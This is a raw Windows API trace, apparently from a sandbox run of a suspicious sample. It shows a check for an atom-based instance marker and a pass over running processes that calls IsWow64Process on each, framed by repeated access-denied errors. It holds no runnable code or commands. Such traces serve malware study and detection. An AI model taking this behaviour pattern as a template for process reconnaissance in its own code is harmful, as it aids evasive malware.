	[0133.458] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.459] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetLastError () returned 0x5
	[0133.460] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.460] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.460] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.460] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.461] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.461] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.461] CloseHandle (hObject=0x2dc) returned 1
	[0133.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.461] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.461] CloseHandle (hObject=0x2dc) returned 1
	[0133.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.462] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.462] CloseHandle (hObject=0x2dc) returned 1
	[0133.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.462] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.462] CloseHandle (hObject=0x2dc) returned 1
	[0133.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.463] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.463] CloseHandle (hObject=0x2dc) returned 1
	[0133.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.463] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.463] CloseHandle (hObject=0x2dc) returned 1
	[0133.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.506] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.506] CloseHandle (hObject=0x2dc) returned 1
	[0133.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.507] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.507] CloseHandle (hObject=0x2dc) returned 1
	[0133.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.507] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.507] CloseHandle (hObject=0x2dc) returned 1
	[0133.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.508] CloseHandle (hObject=0x2dc) returned 1
	[0133.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.508] CloseHandle (hObject=0x2dc) returned 1
	[0133.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.509] CloseHandle (hObject=0x2dc) returned 1
	[0133.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.509] CloseHandle (hObject=0x2dc) returned 1
	[0133.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.510] CloseHandle (hObject=0x2dc) returned 1
	[0133.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.510] CloseHandle (hObject=0x2dc) returned 1
	[0133.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.511] CloseHandle (hObject=0x2dc) returned 1
	[0133.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.511] CloseHandle (hObject=0x2dc) returned 1
	[0133.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.512] CloseHandle (hObject=0x2dc) returned 1
	[0133.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.512] CloseHandle (hObject=0x2dc) returned 1
	[0133.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.512] CloseHandle (hObject=0x2dc) returned 1
	[0133.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.513] CloseHandle (hObject=0x2dc) returned 1
	[0133.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.513] CloseHandle (hObject=0x2dc) returned 1
	[0133.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.514] CloseHandle (hObject=0x2dc) returned 1
	[0133.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.514] CloseHandle (hObject=0x2dc) returned 1
	[0133.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.515] CloseHandle (hObject=0x2dc) returned 1
	[0133.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.515] CloseHandle (hObject=0x2dc) returned 1
	[0133.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.515] CloseHandle (hObject=0x2dc) returned 1
	[0133.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.516] CloseHandle (hObject=0x2dc) returned 1
	[0133.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.516] CloseHandle (hObject=0x2dc) returned 1
	[0133.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.517] CloseHandle (hObject=0x2dc) returned 1
	[0133.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.517] CloseHandle (hObject=0x2dc) returned 1
	[0133.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.518] CloseHandle (hObject=0x2dc) returned 1
	[0133.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.518] CloseHandle (hObject=0x2dc) returned 1
	[0133.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.518] CloseHandle (hObject=0x2dc) returned 1
	[0133.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.519] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.519] CloseHandle (hObject=0x2dc) returned 1
	[0133.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.519] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.519] CloseHandle (hObject=0x2dc) returned 1
	[0133.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
